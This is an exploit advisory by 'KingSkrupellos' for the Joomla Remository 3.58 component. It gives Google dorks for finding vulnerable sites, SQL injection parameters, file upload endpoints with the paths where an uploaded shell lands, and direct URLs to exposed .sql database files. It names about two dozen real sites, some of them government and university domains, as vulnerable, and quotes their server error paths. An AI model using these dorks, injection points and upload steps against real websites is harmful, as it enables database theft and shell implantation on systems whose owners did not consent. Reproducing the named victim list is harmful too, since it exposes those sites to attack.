####################################################################
# Exploit Title : Joomla Remository Components 3.58 SQL Injection / Database Disclosure / Shell Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 30/01/2019
# Vendor Homepage : remository.com
# Software Download Link : remository.com/downloads/joomla-3.x-software/
# Software Information Link : extensions.joomla.org/extension/remository/
# Software Version : 3.58
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/index.php?option=com_remository''
inurl:''/administrator/components/com_remository/''
intext:Site Designed By Conservation Designs
intext:CCCV Gabriel Valencia site:gob.ec
intext:Web creada por softdream.es
intext:Sponsored by Innovatron - Managed by Spirtech
intext:COST Action IC0902, Powered by Joomla! and designed by SiteGround Joomla Templates
intext:Web design by Mercury Web Solutions
intext:Joomla 2.5 Templates Designed by Joomla Templates Free.
intext:© 2001- 2019 by Bayerischer Sportschützenbund e.V.
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
CWE-200 [ Information Exposure ]
CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
####################################################################
# Description about Software :
***************************
“Remository” is open source software for Joomla.
####################################################################
# Impact :
***********
*Attackers can exploit this issue via a browser.
The 'com_remository' component for Joomla! is prone to a vulnerability that lets attackers
upload arbitrary files/shell upload because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the
context of the webserver process. This may facilitate unauthorized access or
privilege escalation; other attacks are also possible.
* An attacker might be able inject and/or alter existing
SQL statements which would influence the database exchange.
* SQL injection vulnerability in the Joomla Remository Components 3.58 because,
it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
* Exploiting this issue could allow an attacker to compromise the application, read,
access or modify data, or exploit latent vulnerabilities in the underlying database.
If the webserver is misconfigured, read & write access to the filesystem may be possible.
####################################################################
# SQL Injection Exploit :
**********************
/index.php?option=com_remository&Itemid=[SQL Injection]
/index.php?option=c&Itemid=[ID-NUMBER]&func=selectcat&cat=[SQL Injection]
/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=[SQL Injection]
/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=
[ID-NUMBER]&orderby=[SQL Injection]
/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=[SQL Injection]
/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=fileinfo&id=[SQL Injection]
/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=
[ID-NUMBER]&orderby=[ID-NUMBER]&page=[SQL Injection]
/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=download&id=
[ID-NUMBER]&chk=[HASH-NUMBERS-HERE]&no_html=[SQL Injection]
####################################################################
# Arbitrary File Upload Exploit :
****************************
/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=addfile
/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=addfile&parent=category
/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=addmanyfiles
/index.php?func=addfile&id=[ID-NUMBER]&Itemid=[ID-NUMBER]&option=com_remository&datum=[DAY]-[MONTH]-[YEAR]
/index.php/shared-file-repository/func-addmanyfiles/
Directory File Path :
******************
Search your file here.
/components/com_remository_files/file_image_[ID-NUMBER]/[RANDOM-NUMBERS]yourshell.php
/components/com_remository_files/......
Note : If websites are not vulnerable it says ;
You have no permitted upload categories - please refer to the webmaster
####################################################################
# Database Disclosure Exploit :
***************************
/administrator/components/com_remository/assignment.sql
/administrator/components/com_remository/blob.sql
/administrator/components/com_remository/containers.sql
/administrator/components/com_remository/file.sql
/administrator/components/com_remository/log.sql
/administrator/components/com_remository/permission.sql
/administrator/components/com_remository/repository.sql
/administrator/components/com_remository/reviews.sql
/administrator/components/com_remository/structure.sql
/administrator/components/com_remository/text.sql
####################################################################
# Example Vulnerable Sites :
*************************
[+] temporalesunoa.com/dgtree/joomla/administrator/components/com_remository/repository.sql
[+] oceap.gov.ng/administrator/components/com_remository/remository.sql
[+] nacat.org/index.php?option=com_remository&Itemid=173&func=addfile&parent=category
[+] jdih.mahkamahagung.go.id/index.php?option=com_remository&Itemid=173&func=addfile&parent=category
[+] telecip.com.co/telecip/index.php?option=com_remository&Itemid=173&func=addfile&parent=category
[+] ics-casalserugo.gov.it/joomla/index.php?option=com_remository&Itemid=78&func=fileinfo&id=40%27
[+] cccv.gob.ec/web/index.php?option=com_remository&Itemid=67&func=select&id=8%27
[+] elsemillero.net/nuevo/index.php?option=com_remository&Itemid=165%27
[+] pymeschamartin.softdream.es/index.php?option=com_remository
&Itemid=7&func=select&id=5&orderby=5&page=3%27
[+] ohaysoft.com/index.php?option=com_remository&Itemid=116&func=
download&id=149&chk=4e4f957a2083a4f41e98e5d163e7bc37&no_html=1%27
[+] fullthrottlesimracing.net/main/index.php?option=com_remository&Itemid=60&func=select&id=3%27
[+] old.tpp.pulawy.pl/index.php?option=com_remository&Itemid=49&func=fileinfo&id=36%27
[+] b2biaxis.com/index.php?option=com_remository&Itemid=416&func=fileinfo&id=2%27
[+] concretedev.com/index.php?option=com_remository&Itemid=37%27
[+] lexcont.de/index.php?option=com_remository&Itemid=4%27
[+] cnawg.net/index.php?option=com_remository&Itemid=28&func=addfile
[+] parachutemanuals.com/index.php?option=com_remository&Itemid=41&func=addfile&id=52
[+] newyork.ing.uniroma1.it/IC0902/index.php?option=com_remository&Itemid=82&func=addfile
[+] kline.ca/index.php?option=com_remository&Itemid=38&func=addfile&id=1
[+] vldb.org/vldb_journal/index.php?option=com_remository&Itemid=60&func=addfile&id=13625
[+] seytpe.gr/25/index.php?option=com_remository&Itemid=100088&func=addmanyfiles
[+] blackburnwithdarwenlink.org.uk/index.php?option=com_remository&Itemid=11&func=addfile&id=25
[+] station-drivers.com/index.php?option=com_remository&Itemid=353&func=addfile&id=373&lang=en
[+] bssb.de/index.php?func=addfile&id=1215&Itemid=647&option=com_remository&datum=01-01-2018
####################################################################
# SQL Database Error :
*********************
Strict Standards: Non-static method JLoader::import() should not be called
statically in /home/elsemillero/public_html/nuevo/libraries/joomla/import.php on line 29
Deprecated: Assigning the return value of new by reference is deprecated in
/home/epangsof/public_html/includes/joomla.php on line 836
Warning: Cannot modify header information - headers already sent by
(output started at /home/epangsof/public_html/includes/joomla.php:836) in
/home/epangsof/public_html/includes/joomla.php on line 697
Fatal error: Uncaught Error: Call to undefined function
set_magic_quotes_runtime() in /home4/hbman23/public_html/main
/includes/framework.php:21 Stack trace: #0 /home4/hbman23/public_html
/main/index.php(22): require_once() #1 {main} thrown in
/home4/hbman23/public_html/main/includes/framework.php on line 21
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################